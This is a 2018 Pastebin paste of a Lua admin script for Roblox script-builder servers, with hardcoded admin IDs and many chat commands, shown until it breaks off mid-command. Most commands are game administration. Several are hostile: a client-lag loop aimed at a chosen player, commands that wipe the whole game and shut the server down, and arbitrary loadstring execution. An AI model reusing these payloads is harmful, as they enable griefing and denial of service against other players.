Advertisement
num6456

Untitled

Mar 30th, 2018
213
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 98.56 KB | None | 0 0
  1. version='0.51'
  2. Mode='Agression'
  3. lego=nil
  4. X=function(f)coroutine.resume(coroutine.create(f))end
  5. if script~=nil then
  6. for i,v in pairs(script:children())do
  7. if v.Name=='y'and v:IsA('StringValue')then
  8. X(function()wait'';loadstring(script:FindFirstChild('y').Value)()end)
  9. return nil
  10. end
  11. end
  12. end
  13. pcall(function()
  14. if game.PlaceId~=0 then
  15. script.Parent=Alakazard
  16. end
  17. script.Name=[[Alakazard's Admin Script]]
  18. end)
  19. pcall(function()game:service('Debris'):AddItem(game:FindFirstChild('ControlFrame',true),0)end)
  20. PlayersList={
  21. Creator={
  22. ChrisLim=19699399,
  23. bloxpeter=774761,
  24. bllue3=3763859,
  25. imthebestdude1=14065455,
  26. Chris10002=4468704,
  27. supersonic805=4778427,
  28. AngelAlex2=14020125,
  29. Deathshot7=16114683,
  30. dmjoe=2944641,
  31. malasiscookieguy=5086179,
  32. blabivix=15706384,
  33. anthony649=3394760
  34. },
  35. Admins={
  36.  
  37. ChrisLim=19699399,
  38. blabivix=15706384,
  39. imthebestdude1=14065455,
  40. octatub=14160976,
  41. Chris10002=4468704,
  42. bllue3=3763859,
  43. supersonic805=4778427,
  44. bloxpeter=774761,
  45. malasiscookieguy=5086179,
  46. dmjoe=2944641,
  47. Deathshot7=16114683,
  48. AngelAlex2=14020125,
  49. anthony649=3394760,
  50. aliadnan=2438626,
  51. thecooldill=2438626,
  52. Mikeydoo=9198729
  53.  
  54. },
  55. Annoying={},
  56. PlayerIP={},
  57.  
  58. KOs={},
  59.  
  60. RunCharacterFunctions={},
  61.  
  62. Runs={
  63. HealthBar={},
  64.  
  65. History={},
  66.  
  67. },
  68.  
  69. Guis={}
  70.  
  71. }
  72. Datas={
  73.  
  74. R={S=false,},
  75.  
  76. }
  77. se={
  78. lighting=game:GetService('Lighting'),
  79. starterpack=game:GetService('StarterPack'),
  80. startergui=game:GetService('StarterGui'),
  81. players=game:GetService('Players'),
  82. workspace=game:service('Workspace'),
  83. debris=game:service('Debris'),
  84.  
  85. insert=game:service('InsertService'),
  86.  
  87. sc=game:service('ScriptContext'),
  88.  
  89. }
  90. Q={}
  91.  
  92. id='rbxassetid://'
  93. baseid='http://www.roblox.com/asset/?id='
  94. --===============Changes===============--
  95. new= Instance.new;
  96. unew= UDim2.new;
  97. vnew= Vector3.new;
  98. fnew= CFrame.new;
  99. cnew= Color3.new;
  100. bcn= BrickColor.new;
  101. look= CFrame.lookVector;
  102. rot= CFrame.fromEulerAnglesXYZ;
  103. --=====================================--
  104. life=function(obj,time)
  105. se.debris:AddItem(obj,time)
  106. end
  107.  
  108. --======================Times======================--
  109. StartTime= tick();
  110. time=function()
  111. ttime=se.workspace.DistributedGameTime
  112. ttime='-'..ttime
  113. for i in string.gmatch(ttime,'%w+')do
  114. ttime=i break
  115. end
  116. return ttime
  117. end
  118. --=================================================--
  119. Backpack=function(p)
  120. for i,e in pairs(p:children())do
  121. if e:IsA('Backpack')then
  122. return e
  123. end
  124. end
  125. bp=new('Backpack',p)
  126. return bp
  127. end
  128. PlayerGui=function(p)
  129. for i,e in pairs(p:children())do
  130. if e:IsA('PlayerGui')then
  131. return e
  132. end
  133. end
  134. return nil
  135. end
  136. StarterGear=function(p)
  137. for i,e in pairs(p:children())do
  138. if e:IsA('StarterGear')then
  139. return e
  140. end
  141. end
  142. bp=new('StarterGear',p)
  143. return bp
  144. end
  145. ListCheck=function(ln,un)
  146. for i,w in pairs(ln)do
  147. if w==un then
  148. return true
  149. end
  150. end
  151. return false
  152. end
  153. Print=function(text)
  154. fakehint=nil
  155. X(function()
  156. fakehint=new('ScreenGui')
  157. life(fakehint,10)
  158. fakehint.Name='Hint~'
  159. gui=new('TextLabel',fakehint)
  160. gui.Text=text..' [ Time: '..time()..' ]'
  161. gui.TextColor3=cnew(1,1,1)
  162. gui.BorderColor3=cnew(0,0,0)
  163. gui.Size=unew(1,0,0,20)
  164. gui.BackgroundTransparency=.5
  165. gui.BorderSizePixel=0
  166. gui.BackgroundColor3=cnew(0,0,0)
  167. gui.FontSize=('Size11')
  168. for i,v in ipairs(se.players:GetPlayers())do
  169. if ListCheck(PlayersList.Admins,v.userId)==true then
  170. if PlayersList.Runs.History[v.Name]==true then
  171. for b,s in pairs(v:children())do
  172. if s:IsA('PlayerGui')then
  173. localhints=0
  174. for l,k in pairs(s:children())do
  175. if k.className=='Hint'then
  176. k:remove()
  177. end
  178. if k.Name=='Hint~'then
  179. localhints=localhints+1
  180. end
  181. end
  182. gui.Position=unew(0,0,0,20*localhints)
  183. Scripting('local','localhints='..localhints..' for n=1,20 do script.Parent.Position=UDim2.new(0,0,0,localhints*n)wait()end',gui)
  184. fakehint.Parent=s
  185. end
  186. end
  187. end
  188. end
  189. end
  190. end)
  191. return fakehint
  192. end
  193. localscript=game:service('InsertService'):LoadAsset(53987736)
  194. delay(.4,function()
  195. localscript=localscript.LocalScript:clone()
  196. localscript.Parent=nil
  197. new('StringValue',localscript).Name='y'
  198. end)
  199. wait(.5)
  200. Print('Waiting for Localscript')
  201. Scripting=function(class,a,p)--Rofl
  202. scrc=nil
  203. if a==''then return end
  204. if Datas.R.S==false then
  205. se.sc.ScriptsDisabled=false
  206. end
  207. X(function()
  208. if class=='local'then
  209. if script==nil then
  210. scr=new('LocalScript')
  211. scr.Source=a
  212. scrc=scr:clone()
  213. scrc.Parent=p
  214. scrc.Disabled=false
  215. else
  216. if localscript~=nil then
  217. scr=localscript:clone()
  218. scr.y.Value=a
  219. scrc=scr:clone()
  220. scrc.Parent=p
  221. scrc.Disabled=false
  222. else
  223. Scripting('script',a,p)
  224. end
  225. end
  226. end
  227. if class=='script'then
  228. if script~=nil then
  229. if game.CreatorId~=9201 then
  230. scr=script:clone()
  231. scr.Name='ALAKAZARD_NEW_SCRIPT'
  232. new('StringValue',scr).Name='y'
  233. scr.y.Value=a
  234. scrc=scr:clone()
  235. scrc.Parent=p
  236. elseif game.CreatorId==9201 then
  237. if anscr==nil then
  238. scr=game:GetService('InsertService'):LoadAsset(53745810)
  239. if #scr:GetChildren()~=0 then
  240. anscr=scr.sb:clone()
  241. elseif #scr:GetChildren()==0 then
  242. if script~=nil then
  243. scr=script:clone()
  244. scr.Name='ALAKAZARD_NEW_SCRIPT'
  245. new('StringValue',scr).Name='y'
  246. scr.y.Value=a
  247. scrc=scr:clone()
  248. scrc.Parent=p
  249. else
  250. scr=new('Script')
  251. scr.Name='ALAKAZARD_NEW_SCRIPT'
  252. scr.Source=a
  253. scrc=scr:clone()
  254. scrc.Parent=p
  255. end
  256. end
  257. end
  258. for i,v in pairs(anscr:GetChildren())do
  259. if v.className=='StringValue'then
  260. v.Value=a
  261. end
  262. end
  263. scrc=anscr:clone()
  264. scrc.Parent=p
  265. end
  266. elseif script==nil then
  267. scr=new('Script')
  268. scr.Name='ALAKAZARD_NEW_SCRIPT'
  269. scr.Source=a
  270. scrc=scr:clone()
  271. scrc.Parent=p
  272. end
  273. end
  274. end)
  275. return scrc
  276. end
  277. Print([[Load Alakazard's Admin Script!]])
  278. time()
  279. clen=0
  280. _G.LS_={
  281. [1]=baseid..'53089014',
  282. [2]=baseid..'53089019',
  283. [3]=baseid..'53089022',
  284. [4]=baseid..'53089026',
  285. [5]=baseid..'53089031',
  286. [6]=baseid..'53089039',
  287. [7]=baseid..'53089046',
  288. [8]=baseid..'53089043',
  289. [9]=baseid..'53089054',
  290. [10]=baseid..'53089068',
  291. [11]=baseid..'53100317',
  292. }
  293. SomethingFunctions={}
  294. GlobalScripts={}
  295. Actual={}
  296. AlakazardCmds={
  297.  
  298. Functions={},
  299.  
  300. NewFunctions={},
  301.  
  302. Objects={},
  303.  
  304. Names={},
  305.  
  306. }
  307. Hats={
  308. AlakazardHats={},
  309. NEMESZISZHats={},
  310. }
  311. Guis={
  312. HealthBar={},
  313. Hint={},
  314. Commands={},
  315. }
  316. Sounds={
  317.  
  318. pax={SoundId='rbxassetid://52155103',Pitch=1,Volume=1,Looped=true},
  319.  
  320. warning={SoundId='rbxassetid://50909479',Pitch=.5,Volume=1,Looped=false},
  321.  
  322. laugh={SoundId='rbxassetid://50251793',Pitch=.3,Volume=1,Looped=false},
  323.  
  324. punch={SoundId='rbxassetid://54612598',Pitch=1,Volume=1,Looped=flase},
  325.  
  326. start={SoundId='rbxassetid://53999348',Pitch=.6,Volume=1,Looped=false}
  327.  
  328. }
  329. Commands={
  330.  
  331. ['cmds/ "Commands..."']=function(v,s)
  332. if scmd(v,'cmds')==false then return end
  333. X(function()
  334. if s:FindFirstChild([[Alakazard's Base Cmds]],true) then return end
  335. for i,t in pairs(Commands)do
  336. if s:FindFirstChild('PlayerGui')then
  337. se.debris:AddItem(Adv(i,s.PlayerGui),#i/10)
  338. wait(#i/10)
  339. end
  340. end
  341. end)
  342. end,
  343.  
  344. ['load/ >script source here<']=function(v,s)
  345. if scmd(v,'load')==false then return end
  346. Source=string.sub(v,clen+1)
  347. X(function()loadstring(Source)()end)
  348. end,
  349.  
  350. ['scr/ >script source here<']=function(v,s)
  351. if scmd(v,'scr')==false then return end
  352. table.insert(GlobalScripts,Scripting('script',string.sub(v,clen+1),se.workspace))
  353. end,
  354.  
  355. ['historyshow/ "ah, I am lazy to write what this command mean... :P"']=function(v,s)
  356. if scmd(v,'historyshow')then return end
  357. PlayersList.Runs.History[s.Name]=true
  358. end,
  359.  
  360. ['historyhide/ "ah, I am lazy to write what this command mean... :P"']=function(v,s)
  361. if scmd(v,'historyhide')then return end
  362. PlayersList.Runs.History[s.Name]=false
  363. end,
  364.  
  365. ['scrl/ >script source here<']=function(v,s)
  366. if scmd(v,'scrl')==false then return end
  367. for i,pg in pairs(s:children())do
  368. if pg.className=='PlayerGui'then
  369. X(function()
  370. table.insert(GlobalScripts,Scripting('local',string.sub(v,clen+1),pg))
  371. end)
  372. end
  373. end
  374. end,
  375.  
  376. ['respawn/user "Respawn."']=function(v,s)
  377. if scmd(v,'respawn')==false then return end
  378. X(function()
  379. for i,pl in pairs(spl(string.sub(v,clen+1),s))do
  380. if script==nil then s:LoadCharacter()return end
  381. m=new('Model',se.workspace)
  382. new('Humanoid',m)
  383. pl.Character=m
  384. end
  385. end)
  386. end,
  387.  
  388. ['disabled/ "newscripts will disabled..."']=function(v,s)
  389. if scmd(v,'disabled')==false then return end
  390. X(function()
  391. Datas.R.S=true
  392. se.sc.ScriptsDisabled=true
  393. end)
  394. end,
  395.  
  396. ['enabled/ "newscripts will undisabled..."']=function(v,s)
  397. if scmd(v,'enabled')==false then return end
  398. X(function()
  399. Datas.R.S=false
  400. se.sc.ScriptsDisabled=false
  401. end)
  402. end,
  403.  
  404. ['lol/ "lol"']=function(v,s)
  405. for i in v:lower():gmatch('%w+')do
  406. if i=='lol'then
  407. newsound=new('Sound')
  408. life(newsound,1)
  409. newsound.Name='lol'
  410. newsound.SoundId=Sounds['laugh'].SoundId
  411. newsound.Pitch=.5
  412. newsound.Volume=1
  413. pcall(function()newsound.Parent=s.Character.Head end)
  414. newsound:play()
  415. break
  416. end
  417. end
  418. end,
  419.  
  420. ['unshield/user']=function(v,s)
  421. if scmd(v,'unshield')==false then return end
  422. for i,pl in pairs(spl(string.sub(v,clen+1),s))do
  423. X(function()
  424. for b,w in pairs(pl.Character:children())do
  425. if w.Name=='Shield'then
  426. w:remove()
  427. end
  428. end
  429. end)
  430. end
  431. end,
  432.  
  433. ['talk/ "This is work if admin not in BaseScripts"']=function(v,s)
  434. if scmd(v,'talk')==false then return end
  435. for i,pl in pairs(spl(string.sub(v,clen+1),s))do
  436. if pcall(function()pl:SetSuperSafeChat(false)end)then
  437. else
  438. Print(s.Name..' Use illegal command')
  439. end
  440. end
  441. end,
  442. ['killguis/ "You will see"']=function(v,s)
  443. if scmd(v,'killguis')==false then return end
  444. for i,pl in ipairs(game:service('Players'):GetPlayers())do
  445. Scripting('local',[[
  446. game:service('Debris'):AddItem(game:FindFirstChild('RobloxGui',true),1)
  447. ]],PlayerGui(pl))wait()
  448. end
  449. end,
  450. ['erh/noob "Lagg for noob"']=function(v,s)
  451. if scmd(v,'erh')==false then return end
  452. for i,pl in pairs(spl(v:sub(clen+1),s))do
  453. Scripting('local',[[
  454. image={53646388,53646377,53645929,53645378,48290678,48260066,48328309,48293007,49316256,48258623,43082279,47595647,47596170,47944712}
  455. num=0
  456. while true do num=num+1
  457. if num==50 then
  458. num=0
  459. wait()
  460. end
  461. for a=0,9 do
  462. for i=0,9 do
  463. screen=Instance.new('ScreenGui',game.CoreGui)
  464. gui=Instance.new('ImageButton',screen)
  465. gui.Image='http://www.roblox.com/asset/?id='..image[math.random(1,#image)]
  466. gui.Size=UDim2.new(.1,0,.1,0)
  467. gui.BackgroundTransparency=1
  468. gui.Position=UDim2.new(i/10,0,a/10,0)
  469. end
  470. end
  471. end
  472. ]],PlayerGui(pl))
  473. end
  474. end,
  475. ['shutup/ "Work if admin not run in BaseScrips"']=function(v,s)
  476. if scmd(v,'shutup')==false then return end
  477. for i,pl in pairs(spl(string.sub(v,clen+1),s))do
  478. if pcall(function()pl:SetSuperSafeChat(true)end)then
  479. else
  480. Print(s.Name..'Use illegal command')
  481. end
  482. end
  483. end,
  484.  
  485. ['shield/user']=function(v,s)
  486. if scmd(v,'shield')==false then return end
  487. for i,pl in pairs(spl(string.sub(v,clen+1),s))do
  488. X(function()pl.Character.Shield:remove()end)
  489. X(function()
  490. shield=new('Part')
  491. shield.Transparency=.5
  492. shield.Shape=0
  493. shield.TopSurface=0
  494. shield.BottomSurface=0
  495. shield.Size=vnew(10,10,10)
  496. shield.BrickColor=bcn(1003)
  497. shield.CanCollide=false
  498. shield.CFrame=pl.Character.Torso.CFrame
  499. bp=new('BodyPosition',shield)
  500. bp.position=shield.Position
  501. bp.P=20000
  502. bp.maxForce=vnew(9999999999999,9999999999999,9999999999999)
  503. X(function()
  504. Scripting('local',[[wait(1)
  505. p=script.Parent.Parent
  506. script.Parent=p.Character.Shield
  507. script.Parent.Touched:connect(function(a)
  508. if a.Parent~=script.Parent.Parent and not a.Parent:IsA('Hat')then
  509. a:breakJoints()
  510. end
  511. end)
  512. while true do
  513. wait()
  514. script.Parent.BodyPosition.position=script.Parent.Parent.Torso.Position
  515. end
  516. ]],s.PlayerGui)
  517. end)
  518. shield.Name='Shield'
  519. shield.Parent=pl.Character
  520. --[[ rp=new('RocketPropulsion',shield)
  521. rp.MaxSpeed=200
  522. rp.MaxThrust=90000
  523. rp.ThrustD=50
  524. rp.ThrustP=800
  525. rp.Target=pl.Character.Torso
  526. rp.MaxTorque=vnew(10000,10000,10000)
  527. rp.TurnD=500
  528. rp.TurnP=0]]
  529. end)
  530. end
  531. end,
  532.  
  533. ['die/user "user will die"']=function(v,s)
  534. if scmd(v,'die')==false then return end
  535. X(function()
  536. for i,pl in pairs(spl(string.sub(v,clen+1),s))do
  537. KO_CREATOR(s,pl)
  538. end
  539. end)
  540. end,
  541.  
  542. ['base/ "New map just a big part."']=function(v,s)
  543. if scmd(v,'base')==false then return end
  544. X(function()
  545. p=new('Part')
  546. p.Size=vnew(1000,3,1000)
  547. p.Anchored=true
  548. p.Name='Base'
  549. p.BrickColor=bcn(37)
  550. p.formFactor=3
  551. p.Locked=true
  552. spawn=new('SpawnLocation',p)
  553. spawn.Size=vnew(4,1,4)
  554. spawn.Transparency=1
  555. spawn.CanCollide=false
  556. spawn.Anchored=true
  557. spawn.Locked=true
  558. spawn.Duration=0
  559. p.Parent=se.workspace
  560. for i,o in pairs(se.workspace:GetChildren())do
  561. if not game.Players:GetPlayerFromCharacter(o) and o~=script and o~=p then
  562. o.archivable=false
  563. se.debris:AddItem(o,.1)
  564. end
  565. end
  566. end)
  567. end,
  568.  
  569. ['shutdown/ "Server ended."']=function(v,s)
  570. if scmd(v,'shutdown')==false then return end
  571. for i,pl in ipairs(game:service('Players'):GetPlayers())do
  572. Scripting('local',[[
  573. game:service('Debris'):AddItem(game:FindFirstChild('RobloxGui',true),1)
  574. remove=function(o)
  575. pcall(function()
  576. for i,v in pairs(o:children())do
  577. pcall(function()game:service('Debris'):AddItem(v,1)end)
  578. pcall(function()remove(v)end)
  579. end
  580. end)
  581. end
  582. remove(game)
  583. ]],PlayerGui(pl))wait()
  584. end
  585. wait(2.5)
  586. pcall(function()game:Shutdown()end)
  587. Clear(game,'all')
  588. X(function()new('ManualSurfaceJointInstance')end)
  589. end,
  590.  
  591. ['nchar/user "Character not found."']=function(v,s)
  592. if scmd(v,'nchar')==false then return end
  593. for i,pl in pairs(spl(v:sub(clen+1),s))do
  594. pl.Character=nil
  595. end
  596. end,
  597.  
  598. ['lama/user "DERP!"']=function(v,s)
  599. if scmd(v,'lama')==false then return end
  600. X(function()
  601. for i,pl in pairs(spl(v:sub(clen+1),s))do
  602. for pn,pg in pairs(pl:GetChildren())do
  603. if pg.className=='PlayerGui'then
  604. screen=new('ScreenGui',pg)
  605. se.debris:AddItem(screen,11)
  606. imagegui=new('ImageLabel',screen)
  607. imagegui.Name='i'
  608. imagegui.BackgroundTransparency=1
  609. imagegui.Position=unew(.4,0,.2,0)
  610. imagegui.Size=unew(0,200,0,300)
  611. screen.Name='Lama'
  612. Scripting('script',[[
  613. for ia=1,33 do
  614. for w,img in pairs(_G.LS_)do
  615. wait(.1)
  616. script.Parent.i.Image=img
  617. end
  618. end
  619. ]],screen)
  620. end
  621. end
  622. end
  623. end)
  624. end,
  625.  
  626. ['kick/user You can^t kicked admins!']=function(v,s)
  627. if scmd(v,'kick')==false then return end
  628. X(function()
  629. for i,pl in pairs(spl(v:sub(clen+1),s))do
  630. if ListCheck(PlayersList.Admins,pl.userId)==false then
  631. se.debris:AddItem(pl,1)
  632. for pn,pg in pairs(pl:GetChildren())do
  633. if pg.className=='PlayerGui'then
  634. pcall(Adv('Bye bye noob',pg,0,0,.5,0))
  635. wait()
  636. end
  637. end
  638. end
  639. end
  640. end)
  641. end,
  642.  
  643. ['ban/user You can^t banned admins!']=function(v,s)
  644. if scmd(v,'ban')==false then return end
  645. X(function()
  646. for i,pl in pairs(spl(v:sub(clen+1),s))do
  647. if ListCheck(PlayersList.Admins,pl.userId)==false then
  648. se.debris:AddItem(pl,1)
  649. table.insert(PlayersList.Annoying,pl.Name)
  650. for pn,pg in pairs(pl:GetChildren())do
  651. if pg.className=='PlayerGui'then
  652. pcall(Adv('Bye bye noob',pg,0,0,.5,0))
  653. wait()
  654. end
  655. end
  656. end
  657. end
  658. end)
  659. end,
  660.  
  661. ['heal/user "You know this mean."']=function(v,s)
  662. if scmd(v,'heal')==false then return end
  663. for i,pl in pairs(spl(v:sub(clen+1),s))do
  664. if pl.Character~=nil then
  665. for asdasd,hum in pairs(pl.Character:GetChildren())do
  666. if hum.className=='Humanoid'then
  667. hum.Health=hum.MaxHealth
  668. end
  669. end
  670. end
  671. end
  672. end,
  673.  
  674. ['replace/ "Remove all stuff in game"']=function(v,s)
  675. if scmd(v,'replace')==false then return end
  676. delay(0,function()
  677. BasePart=new('Part')
  678. BasePart.Size=vnew(1000,1,1000)
  679. BasePart.Anchored=true
  680. BasePart.BrickColor=BrickColor.random()
  681. BasePart.Name='Base'
  682. BasePart.Parent=workspace
  683. replace=function(o)
  684. for i,v in pairs(o:children())do
  685. pcall(function()replace(v)end)
  686. if v.className~='Player'and v~=script and v~=BasePart and v~=m_ and v.className~='PlayerMouse'then
  687. pcall(function()v.Health=0 v.MaxHealth=0 v:BreakJoints()end)
  688. pcall(function()v.Disabled=true end)
  689. pcall(function()v.archivable=false end)
  690. pcall(function()v:remove()end)
  691. end
  692. end
  693. end
  694. replace(game)
  695. for i,pl in pairs(spl('all',s))do
  696. if script==nil then s:LoadCharacter()return end
  697. m=new('Model',se.workspace)
  698. new('Humanoid',m)
  699. pl.Character=m
  700. end
  701. se.lighting.GeographicLatitude=41.73
  702. se.lighting.TimeOfDay=14
  703. se.lighting.ShadowColor=cnew(.701961,.701961,.721569)
  704. se.lighting.ColorShift_Top=cnew(0,0,0)
  705. se.lighting.ColorShift_Bottom=cnew(0,0,0)
  706. se.Ambient=cnew(.501961,.501961,.501961)
  707. se.Brightness=1
  708. end)
  709. end,
  710.  
  711. ['staff/user "This is make Alakazard'..'\39'..'s staff for user"']=function(v,s)
  712. if scmd(v,'staff')==false then return end
  713. for i,pl in pairs(spl(v:sub(clen+1),s))do
  714. Staff(Backpack(pl))
  715. end
  716. end,
  717.  
  718. ['flybin/ "This is make my fly hopperbin. -Alakazard"']=function(v,s)
  719. if scmd(v,'flybin')==false then return end
  720. for i,pl in pairs(spl(v:sub(clen+1),s))do
  721. FlyBin(Backpack(pl))
  722. end
  723. end,
  724.  
  725. ['inf/user "User have inf health"']=function(v,s)
  726. if scmd(v,'inf')==false then return end
  727. for i,pl in pairs(spl(v:sub(clen+1),s))do
  728. if pl.Character~=nil then
  729. for i,h in pairs(pl.Character:children())do
  730. if h:IsA('Humanoid')then
  731. for b,n in pairs(h:children())do
  732. if n.Name=='inf'then
  733. n:remove()
  734. end
  735. end
  736. end
  737. end
  738. for a,w in pairs(pl:children())do
  739. if w:IsA('PlayerGui')then
  740. Scripting('local',[[script.Name='inf'
  741. for i,v in pairs(script.Parent.Parent.Character:children())do
  742. if v:IsA('Humanoid')then
  743. script.Parent=v
  744. end
  745. end
  746. if script.Parent:IsA('Humanoid')then
  747. print'Humanoid found!'
  748. else
  749. script:remove()
  750. end
  751. script.Parent.Name='ฤ |:| Alanoid |:| ฤ'
  752. script.Parent.MaxHealth=1000
  753. script.Parent.Health=1000
  754. script.Parent.HealthChanged:connect(function()
  755. script.Parent.MaxHealth=1000
  756. script.Parent.Health=1000
  757. script.Parent.Torso.Parent:MakeJoints()
  758. end)]],w)
  759. end
  760. end
  761. end
  762. end
  763. end,
  764.  
  765. ['csb/ "Removed all admin script. asd"']=function(v,s)
  766. if scmd(v,'csb')==false then return end
  767. for i,s in pairs(GlobalScripts)do
  768. s.archivable=false
  769. s:remove()
  770. end
  771. end,
  772.  
  773. ['admin/user "Commands work for user."']=function(v,s)wait()
  774. if scmd(v,'admin')==false then return end
  775. for i,pl in pairs(spl(v:sub(clen+1),s))do
  776. if ListCheck(PlayersList.Admins,pl.userId)==false then
  777. table.insert(PlayersList.Admins,pl.userId)
  778. PlayerFunctionsConnect(pl)
  779. Print('New admin '..pl.Name..'!')
  780. end
  781. end
  782. end,
  783.  
  784. ['adv/test "Hint"']=function(v,s)
  785. if scmd(v,'adv')==false then return end
  786. for i,pl in pairs(spl('all',s))do
  787. for a,pgi in pairs(pl:GetChildren())do
  788. if pgi.className=='PlayerGui'then
  789. Adv(v:sub(clen+1),pgi,0,0,0,0)
  790. end
  791. end
  792. end
  793. end,
  794.  
  795. ['frz/user "Freeze user character."']=function(v,s)
  796. if scmd(v,'frz')==false then return end
  797. for i,pl in pairs(spl(v:sub(clen+1),s))do
  798. if pl.Character~=nil then
  799. for c,part in pairs(pl.Character:GetChildren())do
  800. if part.className=='Part'then
  801. part.Anchored=true
  802. end
  803. end
  804. end
  805. end
  806. end,
  807.  
  808. ['cape/user "Cape on yourh torso =3"']=function(v,s)
  809. if scmd(v,'cape')==false then return end
  810. for i,pl in pairs(spl(v:sub(clen+1),s))do
  811. if pl.Character~=nil then
  812. for ti,hum in pairs(pl.Character:GetChildren())do
  813. if hum.className=='Humanoid'then
  814. if hum.Torso~=nil then
  815. for iao,humt in pairs(hum.Torso:GetChildren())do
  816. if humt.Name=='Cape'then
  817. humt:remove()
  818. end
  819. end
  820. cpart=new('Part')
  821. cpart.CanCollide=false
  822. cpart.Name='Cape'
  823. cpart.BrickColor=bcn(1003)
  824. cpart.formFactor=3
  825. cpart.Size=vnew(.3,4,3)
  826. cpart.TopSurface=('Smooth')
  827. cpart.BottomSurface=('Smooth')
  828. cpart.Parent=hum.Torso
  829. cweld=new('Motor')
  830. cweld.Parent=hum.Torso
  831. cweld.Name='cCape'
  832. cweld.Part0=hum.Torso
  833. cweld.Part1=cpart
  834. cweld.C0=rot(0,1.57,0)+vnew(0,0,0)
  835. cweld.C1=fnew(.66,1,0)
  836. cweld.DesiredAngle=-.25
  837. cweld.MaxVelocity=.2
  838. Scripting('script',[[hum=script.Parent
  839. cweld=hum.Torso.cCape
  840. cape=cweld.Part1
  841. d=function()
  842. cape.Parent=workspace
  843. cape.Anchored=true
  844. for i=1,10 do
  845. wait()
  846. cape.Transparency=i/10
  847. end
  848. end
  849. hum.Died:connect(d)
  850. ]],hum)
  851. end
  852. end
  853. end
  854. end
  855. end
  856. end,
  857.  
  858. ['thw/user "Thaw user character."']=function(v,s)
  859. if scmd(v,'thw')==false then return end
  860. for i,pl in pairs(spl(v:sub(clen+1),s))do
  861. if pl.Character~=nil then
  862. for c,part in pairs(pl.Character:GetChildren())do
  863. if part.className=='Part'then
  864. part.Anchored=false
  865. end
  866. end
  867. end
  868. end
  869. end,
  870.  
  871. ['rhats/user "Thaw user character."']=function(v,s)
  872. if scmd(v,'rhats')==false then return end
  873. for i,pl in pairs(spl(v:sub(clen+1),s))do
  874. if pl.Character~=nil then
  875. for c,hat in pairs(pl.Character:GetChildren())do
  876. if hat.className=='Hat'then
  877. hat:remove()
  878. end
  879. end
  880. end
  881. end
  882. end,
  883.  
  884. ['tele/user/user2 "user(s) position == user2 position"']=function(v,s)
  885. if scmd(v,'tele')==false then return end
  886. Findw(v,'tele',2)
  887. for i,pl in pairs(spl(Q[1],s))do
  888. for a,ppll in pairs(spl(Q[2],s))do
  889. X(function()pl.Torso.CFrame=ppll.Torso.CFrame end)
  890. end
  891. end
  892. end,
  893.  
  894. ['unpunish/user "Character not in workspace, but you can put back. if you say unpunish/user"']=function(v,s)
  895. if scmd(v,'unpunish')==false then return end
  896. for i,pl in pairs(spl(v:sub(clen+1),s))do
  897. if pl.Character~=nil then
  898. char=pl.Character
  899. char.Parent=se.workspace
  900. char:MakeJoints()
  901. end
  902. end
  903. end,
  904.  
  905. ['punish/user "Character not in workspace, but you can put back. if you say unpunish/user"']=function(v,s)
  906. X(function()
  907. if scmd(v,'punish')==false then return end
  908. for i,pl in pairs(spl(v:sub(clen+1),s))do
  909. if pl.Character~=nil then
  910. pl.Character.Parent=nil
  911. end
  912. end
  913. end)
  914. end,
  915.  
  916. ['rtools/user "Removed user backpack."']=function(v,s)
  917. if scmd(v,'rtools')==false then return end
  918. for i,pl in pairs(spl(v:sub(clen+1),s))do
  919. for ia,plb in pairs(pl:GetChildren())do
  920. if plb.className=='Backpack'then
  921. plb:remove()
  922. Instance.new('Backpack',pl)
  923. end
  924. end
  925. end
  926. end,
  927.  
  928. ['dis/ "This disabled new scripts!"']=function(v,s)
  929. if scmd(v,'dis')==false then return end
  930. se.sc.ScriptsDisabled=true
  931. end,
  932.  
  933. ['ena/ "This enabled new scripts!"']=function(v,s)
  934. if scmd(v,'ena')==false then return end
  935. se.sc.ScriptsDisabled=false
  936. end,
  937.  
  938. ['instance/int "Anaminus SBs block command 0=dont block 1=block scripts"']=function(v,s)
  939. if scmd(v,'instance')==false then return end
  940. intn=v:sub(clen+1,clen+1):lower()
  941. if intn==nil or intn=='' then return end
  942. if intn=='x' then Instance.new=nil end
  943. if intn=='o' then Instance.new=new end
  944. end,
  945.  
  946. ['clear/ "this remove all script"']=function(v,s)
  947. if scmd(v,'clear')==false then return end
  948. Clear(game,'script')
  949. end,
  950.  
  951. ['ans/int "Anaminus SBs block command 0=dont block 1=block scripts"']=function(v,s)
  952. if scmd(v,'ans')==false then return end
  953. intn=v:sub(clen+1,clen+1)
  954. if intn==nil or intn=='' then return end
  955. if AnaSbCheck1~=nil then
  956. AnaSbCheck1:disconnect()AnaSbCheck1=nil
  957. end
  958. if intn==0 or intn=='0'then return end
  959. if intn==1 or intn=='1'then
  960. AnaSbCheck1=se.workspace.ChildAdded:connect(function(asd)
  961. for i,a in pairs(AnaminusBlock)do
  962. if asd~=nil then
  963. a(asd)
  964. end
  965. end
  966. end)
  967. end
  968. end,
  969.  
  970. ['hint/ "hint in screen"']=function(v,s)
  971. if scmd(v,'hint')==false then return end
  972. X(function()
  973. for i,pl in pairs(spl('all',s))do
  974. for a,pg in pairs(pl:GetChildren())do
  975. if pg.className=='PlayerGui'then
  976. _HM(v:sub(clen+1),'Hint',pg)
  977. end
  978. end
  979. end
  980. end)
  981. end,
  982.  
  983. ['cln/objectname']=function(v,s)
  984. if scmd(v,'cln')==false then return end
  985. X(function()AlakazardCmds.Names.clear=v:sub(clen+1)ChangeClear(game,'name')end)
  986. end,
  987.  
  988. ['mess/ "message in screen"']=function(v,s)
  989. if scmd(v,'mess')==false then return end
  990. X(function()
  991. for i,pl in pairs(spl('all',s))do
  992. for a,pg in pairs(pl:GetChildren())do
  993. if pg.className=='PlayerGui'then
  994. _HM(v:sub(clen+1),'Message',pg)
  995. end
  996. end
  997. end
  998. end)
  999. end,
  1000.  
  1001. ['kos/user "..."']=function(v,s)
  1002. if scmd(v,'kos')==false then return end
  1003. X(function()
  1004. for i,pl in pairs(spl(v:sub(clen+1),s))do
  1005. if ListCheck(PlayersList.Admins,pl.userId)==false then
  1006. KO(s,pl)
  1007. end
  1008. end
  1009. end)
  1010. end,
  1011.  
  1012. ['rguis/user "Removed user guis."']=function(v,s)
  1013. if scmd(v,'rguis')==false then return end
  1014. for i,pl in pairs(spl(v:sub(clen+1),s))do
  1015. for ia,plb in pairs(pl:GetChildren())do
  1016. if plb.className=='PlayerGui'then
  1017. for i,v in pairs(plb:children())do v:remove()end
  1018. Scripting('local',[[
